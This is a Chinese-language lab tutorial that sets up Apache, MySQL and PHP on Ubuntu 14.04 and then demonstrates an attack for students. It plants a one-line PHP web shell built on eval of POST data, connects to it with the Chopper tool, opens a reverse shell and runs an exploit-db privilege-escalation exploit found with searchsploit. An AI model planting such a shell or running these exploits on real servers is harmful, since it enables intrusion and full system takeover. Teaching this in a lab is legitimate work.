ubuntu14.04.4下载地址:
链接:https://pan.baidu.com/s/1kqY3BzVop87Iid1TZJk67w
提取码:cuzt
1,安装apache - <font size="5"> sudo apt-get update
- sudo apt-get install apache2</font>
复制代码 这时http://你机器的ip,就可以访问了。
2,安装mysql - <font size="5">sudo apt-get install mysql-server php5-mysql</font>
复制代码 安装过程中会要求你输入root用户的密码 安装完成后执行 - <font size="5">sudo mysql_install_db</font>
复制代码 这句的意思是初始化数据库目录结构 安装完成后 mysql -u root -p 输入密码应该是可以进入数据库的. 指定编码创建数据库: - <font size="5">CREATE DATABASE IF NOT EXISTS yourdbname DEFAULT CHARSET utf8 COLLATE utf8_general_ci;</font>
复制代码 从文件导入数据: 进入指定库后,source /var/tmp/all.mysql 导出数据: - <font size="5">mysqldump -u$USER -p$PASSWD -h127.0.0.1 -P3306 --routines --default-character-set=utf8 --databases mysql > db.all.sql</font>
复制代码
3,安装php及一些必要的扩展 sudo apt-get install php5 libapache2-mod-php5 php5-mcrypt php5-curl php5-imagick php5-cli 如果你想找找其它扩展可以用命令:apt-cache search php5-
4,修改默认主页 修改 /etc/apache2/mods-enabled/dir.conf
把DirectoryIndex index.html index.cgi index.pl index.php index.xhtml index.htm中index.php改到最前面(可以根据自已需要)
如:DirectoryIndex index.php index.html index.cgi index.pl index.xhtml index.htm
5,重启apache2让修改生效,并测试 重启apache2:sudo service apache2 restart ubuntu14.04中apache的网站主目录是在:/var/www/html 在此目录新建info.php文件,内容为: <?php phpinfo(); ?> 访问:http://你服务器ip/info.php如果显示php环境信息,测表示安装成功 6,新建站点 在apache2的配置目录(/etc/apache2/)中有两个目录是与新建站点有关的 sites-availables包含所有站点文件,即有启用的与非启用的 sites-enabled包含启用了的站点,一般来说sites-enabled里的文件是sites-availables链接 在/etc/apache2/apache2.conf文件中包含一句:IncludeOptional sites-enabled/*.conf,所以只有在sites-enabled目录中加了站点文件才会生效 在sites-availables里添加文件test.conf ln -s /etc/apache2/sites-availables/test.conf /etc/apache2/sites-enabled/test.conf 7,编辑站点文件 - <font size="5"><VirtualHost *:80>
- ServerName test.com
- ServerAlias www.test.com
- ServerAlias a.test.com
- ServerAdmin webmaster@localhost
- DocumentRoot /var/www/test
- </VirtualHost></font>
复制代码本机测试添加hosts记录,即可访问。 8,进入/var/www/html/ 目录,新建一个一句话木马 one.php - <?php
- eval($_POST[1]);
- ?>
复制代码
9,菜刀连接这个文件。
10,终端执行 whoami 查看自己的权限
11,反弹shell
12,查看内核
13,使用kalilinux 搜索 关于ubuntu14的漏洞 exp
https://www.exploit-db.com/exploits/37292/- searchsploit ubuntu 14 -w
复制代码
14,执行提权exp
按照提示,下载,编译,执行
提权成功!
给学生演示,安装ssh,xshell 远程连接,搭建apache环境
sudo apt-get update
sudo apt-get install openssh-server
|